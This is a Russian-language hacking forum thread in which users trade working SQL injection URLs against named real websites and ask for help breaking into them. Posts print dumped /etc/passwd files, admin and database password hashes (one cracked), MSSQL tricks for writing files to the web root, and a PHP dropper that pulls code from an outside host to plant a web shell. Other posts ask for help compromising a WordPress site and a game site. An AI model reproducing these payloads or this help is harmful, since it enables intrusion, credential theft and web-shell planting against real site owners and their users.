Привет всем!Нужна помощь!!! Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/ Зарание спосибо!!!
Всем привет.. Товарисчи такое вот дело.. нашел скуль и все бы не чего если бы база была mysql c outfile, но увы MSSQL. Побегал по форуму нашел кое что пробую, пишет - Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) сам запрос - Code: http://ip/stat.php?type=melee'+union+select+1,'<?php eval($_GET['e']) ?>',3,4,5,6,7,8,9,10,11,12,13+exec+master..sp_makewebtask+'D:\AppServ\www\123.txt'%20-- Что тут не так?
6u4yxa, дело в том, что у каждой СУБД свой синтаксис. Вот, почитай статейку - https://forum.antichat.ru/thread30501.html
нашол скуль, фильтрации на чтения каталогов нет http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,load_file('../../../etc/passwd'),6/* http://dengi-info.com/phpinfo.php пхпинфо - там есть полные пути хотел прочитать файл админки неполучаеца =\ путь - /var/www/vhosts/dengi-info.com/httpdocs или /var/www/vhosts/dengi-info.com админка - http://dengi-info.com/admin/index.php HTML: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webadmin:x:500:500::/home/webadmin:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin popa3d:x:84:501::/dev/null:/dev/null postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin alias:x:2021:2020:Qmail User:/var/qmail/alias:/bin/false qmaild:x:2020:2020:Qmail User:/var/qmail/:/bin/false qmaill:x:2022:2020:Qmail User:/var/qmail/:/bin/false qmailp:x:2023:2020:Qmail User:/var/qmail/:/bin/false qmailq:x:2520:2520:Qmail User:/var/qmail/:/bin/false qmailr:x:2521:2520:Qmail User:/var/qmail/:/bin/false qmails:x:2522:2520:Qmail User:/var/qmail/:/bin/false popuser:x:110:31:POP3 service user:/var/qmail/popuser:/bin/false psaadm:x:2523:2521:Admin Server:/:/bin/false psaftp:x:2524:2522:anonftp psa user:/:/bin/false lukasaddon:x:10001:2524::/var/www/vhosts/dengi-info.com:/bin/false teletrade:x:10002:2524::/var/www/vhosts/teletrade.com.ua:/bin/false kiev:x:10003:2524::/var/www/vhosts/teletrade.kiev.ua:/bin/false aserrr:x:10004:2524::/var/www/vhosts/teletrade.bg:/bin/false Почему немогу прочитать, и что делать...? кодировал ефекта 0.
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,5,concat(admin,0x3a,admin_pw)+from+phpads_config/* admin:dee9eb25bb8bf64bb3097fd26c13911c - обычный md5 .зы попробовать к админке оч даже можно .. =============================== http://www.dengi-info.com/forum//docs/CHANGELOG.html 3 пхпбб // возможно колонки по дефолту - не помню какие в 3ем .. =============================== http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,password+from+mysql.user+limit+1,1 юзер pma_kIkP50QYhmSS наводит мысль о скрытом, а точнее переименованном phpmyadmin .. тк кк дефолтные имена не нашёл .. =============================== http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,concat_ws(0x3a,user,password,host)+from+mysql.user+where+host=0x25+limit+0,1/* kpblca:28b270316169288e:% - возможно получится подконектится удалённо к базе ..
ДЛя MSSQL нашел как вывести в файл запрос. EXEC master..sp_makewebtask “file.txt”, “sql-query”. Пробую - http://ip/stats.php?type=man';exec+master..sp_makewebtask+'D:\appserv\www\123.txt', 'select+*+FROM+dbo.auth'-- но результат ноль пишет Incorrect syntax near '\'. Как залить шелл через мсску... или вывести данные в тхт файл.. З.Ы. - None, прочитал статью https://forum.antichat.ru/thread30501.html. через подзапрос почему то не выводит из таблиц зато через UNION работает на ура..На такой запрос '+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' name'))-- как только начинаю использовать NOT IN сразу не правильный синтаксис... =((
Разобрался с выводом файл делаю так: - Работает! а как зделать что бы как в Mysql через OUTFILE заливать шелы.. мне надо вставить вот это <?php $a=file_get_contents(\'http://ip/2008.txt\'); $f=fopen(\'sql.php\',\'a\'); fputs($f,$a); fclose($f); ?> - вставляя в одну из колонок так же как в mysql в файл вообще не е не скидывается.. Как мне вывести в файл вот этот кусок кода?
Нашел такое во трешение но опять споткнулся.. создать таблицу залить в неё пхп скрипт и потом вывести в в файл.. делаю http://ip/stat.php?type=melee';create table shell (code varchar(8000))-- потом insert into shell (code) values ('|code|')-- а вотут опять пишет на синтаксис, что тут не так? Если вписывать INSERT into dbo..shell (code) values (123)-- без ковычек.. то в базу добавляется значение 123.. а пхп скрипт даже <?php phpinfo(); ?> вообще ни как=((?
INSERT into dbo..shell (code) values (CHAR(65)+CHAR(67)....) в ASCII переведи, если при конкатенации знаком "+" возникнут проблемы, то можно использовать функцию STUFF для конкатенации значений.
Вообещм разобрался пошел по пути создание базы запись в неё пхп скрипта и вывод в файл.. так как из за ковычек не как не хотел использовал http://www.motobit.com/util/binary-file-to-sql-hexstring.asp для перевода в хекс после этого запись в базу без проблем, но заливая туда скрипт <?php $a=file_get_contents('ip/123.txt'); $f=fopen('sqlsearch.php','a'); fputs($f,$a); fclose($f); ?> (ввиде хекса)- и после того как данные таблицы вывожу в файл ковычки автоматом почему то экранируются и получается <?php $a=file_get_contents(\'http://ip/123.txt\'); $f=fopen(\'sqlsearch.php\',\'a\'); fputs($f,$a); fclose($f); ?> после чего перейдя по ссылке сыпятся ошибки - Warning: Unexpected character in input: '\' (ASCII=92) state=1 in D:\AppServ\www\5.php on line 20 Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20 как это обойти? Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20
братья, простите что немного не потеме.... помогите сделать такую штуку: домен site.ru у него есть внутренняя страница, например про стройку, как сделать название страницы и в какой кодировке прописать ее в коде страницы, чтобы при переходе на данную страницу она имела такой вид: "www.site.ru/стройка" ???
Как можно расшарить вот этот сайт http://citywars.ru/? ВРоде бы как защита слабая (что то есть) http://citywars.ru/photo/ ... .ПОмоите что нибудь найти ->Игра начала работать только вчера
Нужна помощь с колонками! http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,2,3,4,5,6,7/* http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,@@version,3,4,5,6,7/* тут 5.0.33 http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES-- получаю имена таблиц: <code>» CHARACTER_SETS (0) » COLLATIONS (0) » COLLATION_CHARACTER_SET_APPLICABILITY (0) » COLUMNS (0) » COLUMN_PRIVILEGES (0) » KEY_COLUMN_USAGE (0) » ROUTINES (0) » SCHEMATA (0) » SCHEMA_PRIVILEGES (0) » STATISTICS (0) » TABLES (0) » TABLE_CONSTRAINTS (0) » TABLE_PRIVILEGES (0) » TRIGGERS (0) » USER_PRIVILEGES (0) » VIEWS (0) » cat_body (0) » cat_level (0) » cat_rubrics (0) » cat_set (0) » righttable (0) » user_group (0) » userlog (0) » usertable (0) » variables (0)</code> http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7 from+information_schema.columns+where+table_name=0x757365727461626c65+limit+1,1/* http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_name,usr_password),3,4,5,6,7+from+usertable+limit+1,1/* получаю Денис:876993158b491f4626155b468ffb6edc 876993158b491f4626155b468ffb6edc=zerozero но к админике не подходит! Почему? В user_group нашол usr_id » grp_id но колонки с пасом не нашел!
